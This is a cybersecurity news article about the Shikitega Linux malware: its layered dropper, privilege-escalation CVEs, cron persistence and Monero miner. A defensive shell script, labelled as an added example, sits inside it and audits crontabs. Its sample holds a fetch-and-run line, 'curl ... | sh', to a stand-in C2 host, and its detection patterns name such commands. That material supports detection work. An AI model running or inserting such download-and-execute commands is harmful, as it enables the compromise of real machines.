
Shikitega Linux malware uses multi-stage deployment to avoid detection


Researchers at AT&T Alien Labs have discovered a new Linux malware known as Shikitega. The malware targets computers and IoT devices and exploits vulnerabilities in the Linux system to elevate privileges, add persistence and launch a crypto miner on the target system. 

The malware uses a polymorphic encoder to evade detection by making static, signature-based detection virtually impossible. Furthermore, it downloads and executes Metasploit’s “Mettle” meterpreter to maximise control over infected devices and abuses legitimate cloud services to store its command and control servers. 

Metasploit is a popular penetration testing suite often found bundled with specialised operating systems like Kali Linux. Its uses often include creating malicious payloads for pretty much everything under the sun, including Linux devices and Android phones.


A layered infection chain

According to the researchers, Shikitega uses a multi-layer infection chain. The first step only contains a few hundred bytes and is divided into modules, each responsible for a specific task including downloading and executing the Metasploit meterpreter, exploiting Linux vulnerabilities (CVE-2021-4034 and CVE-2021-3493) to escalate privileges, setting persistence in the infected machine using Cron and finally downloading and executing a crypto miner. 

The Shikitega malware infection chain. | Source: AT&T Cybersecurity

The main dropper is a small ELF file about 370 bytes in size; the actual code is even smaller, coming in at around 300 bytes. It derives its name from the “Shikata Ga Nai” polymorphic XOR additive feedback encoder. This allows the malware to run in looped stages, where each loop decodes the next stage until the final payload is decoded and executed.

Once execution is complete, the C&C server kicks in with additional shell commands to execute on the target machine. This involves downloading additional files from the server that are executed from memory only. These files aren’t saved on the hard drive, further minimising the chances of detection.

The malicious ELF file with the payload and ELF header. | Source: AT&T Cybersecurity

As for persistence, the malware downloads and executes five different shell scripts and persists in the system by setting four crontabs — two for the currently logged-in user and two for the root user. The malware even checks whether the crontab command exists on the system before installing the malicious cron jobs. Additionally, to ensure that only one instance of the malware runs at any given time, it uses flock with a lock file.

Finally, the malware downloads and executes the XMRig miner (version 6.17.0), a popular miner for Monero. It also sets an additional crontab to download and execute the crypto miner from the C&C server.
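As an added defender-side example (not from the article or the AT&T Alien Labs report), the following shell script audits cron entries for the persistence traits the two paragraphs above describe: a job that fetches a script and pipes it into a shell, a flock lock file, and scripts run from temp directories. The regex, the sample crontab and the host name in it are constructed assumptions, not indicators from the report.

```shell
#!/bin/sh
# Added example, not from the article or AT&T Alien Labs: audit cron entries
# for the persistence traits described above (fetch-and-pipe-to-shell jobs,
# flock single-instance lock files, scripts run from temp directories).
# Regex, sample crontab and host name are constructed for illustration.

# Extended regex of traits worth a second look in a scheduled command.
SUSPICIOUS_RE='(curl|wget)[^|;]*\|[[:space:]]*(sh|bash)[[:space:]]*($|[;&])'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|flock[[:space:]]+(-[A-Za-z]+[[:space:]]+)*/[^[:space:]]*\.lock'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|base64[[:space:]]+(-d|--decode)'
SUSPICIOUS_RE="$SUSPICIOUS_RE"'|(/tmp|/var/tmp|/dev/shm)/[^[:space:]]*\.sh'

# Read crontab text on stdin, skip comments, blank lines and VAR=value lines,
# and print the schedule lines matching SUSPICIOUS_RE (never fails).
flag_suspicious_cron() {
    grep -E -v '^[[:space:]]*(#|$|[A-Za-z_]+=)' | grep -E -- "$SUSPICIOUS_RE" || true
}

# Number of flagged lines in the crontab text on stdin.
count_suspicious_cron() {
    flag_suspicious_cron | grep -c '' || true
}

# Audit the live crontabs of the given users plus the system cron files.
# Reading another user's crontab (e.g. root) requires root privileges.
audit_host_crontabs() {
    for u in "$@"; do
        crontab -u "$u" -l 2>/dev/null | flag_suspicious_cron | sed "s|^|[$u] |"
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | flag_suspicious_cron | sed 's|^|[system] |'
}

# Constructed sample crontab: two benign jobs and two that show the traits above.
SAMPLE_CRONTAB='# m h dom mon dow command
PATH=/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://c2.example.invalid/s.sh | sh
@reboot flock -n /tmp/.x.lock /tmp/.run.sh
@hourly /opt/monitor/check_disk.sh'

# Demo on the sample; run "audit_host_crontabs root $(whoami)" on a real host.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_suspicious_cron
printf 'flagged: %s\n' "$(printf '%s\n' "$SAMPLE_CRONTAB" | count_suspicious_cron)"
```

Because the malware installs jobs for both the logged-in user and root, the audit has to cover both crontabs, not just the one `crontab -l` shows for the current user.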

The researchers recommend keeping software up to date, having antivirus or EDR installed on all endpoints, and using a backup system to back up server files. That said, the malware is still expected to be a major headache for some time.


Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018.
